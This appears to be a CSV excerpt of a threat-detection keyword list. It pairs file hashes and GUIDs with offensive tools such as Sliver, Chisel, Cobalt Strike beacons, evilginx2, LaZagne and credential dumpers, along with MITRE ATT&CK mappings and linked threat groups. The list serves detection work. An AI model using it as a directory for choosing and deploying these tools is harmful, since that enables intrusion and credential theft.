"*72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4*",".{0,1000}72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a*",".{0,1000}72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed*",".{0,1000}72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c*",".{0,1000}72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1*",".{0,1000}7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*732211ae-4891-40d3-b2b6-85ebd6f5ffff*",".{0,1000}732211ae\-4891\-40d3\-b2b6\-85ebd6f5ffff.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*73226E13-1701-424E-A4F2-3E4D575A1DD0*",".{0,1000}73226E13\-1701\-424E\-A4F2\-3E4D575A1DD0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7*",".{0,1000}733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84*",".{0,1000}733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2*",".{0,1000}73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece*",".{0,1000}73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f*",".{0,1000}73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb*",".{0,1000}736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426*",".{0,1000}7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254*",".{0,1000}73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*73948912-CEBD-48ED-85E2-85FCD1D4F560*",".{0,1000}73948912\-CEBD\-48ED\-85E2\-85FCD1D4F560.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*73B2C22B-C020-45B7-BF61-B48F49A2693F*",".{0,1000}73B2C22B\-C020\-45B7\-BF61\-B48F49A2693F.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" 
"*73F11EE8-F565-479E-8366-BD74EE467CE8*",".{0,1000}73F11EE8\-F565\-479E\-8366\-BD74EE467CE8.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9*",".{0,1000}7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7423162b1a3b77b3cb5f76173204dd5983b683ae*",".{0,1000}7423162b1a3b77b3cb5f76173204dd5983b683ae.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe*",".{0,1000}743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7443/new/payloads*",".{0,1000}7443\/new\/payloads.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18*",".{0,1000}745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1*",".{0,1000}74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625*",".{0,1000}74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a*",".{0,1000}75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178*",".{0,1000}7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30*",".{0,1000}7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599*",".{0,1000}75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534*",".{0,1000}75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311*",".{0,1000}7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139*",".{0,1000}75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe*",".{0,1000}75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*75E5F9A0-8D69-4426-9F16-4A65E941974D*",".{0,1000}75E5F9A0\-8D69\-4426\-9F16\-4A65E941974D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce*",".{0,1000}75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d*",".{0,1000}760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to 
retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43*",".{0,1000}7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83*",".{0,1000}76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2*",".{0,1000}763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36*",".{0,1000}7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3*",".{0,1000}764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40*",".{0,1000}7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*765C5755-DBE9-4AB5-9427-921D0E46F9F0*",".{0,1000}765C5755\-DBE9\-4AB5\-9427\-921D0E46F9F0.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" 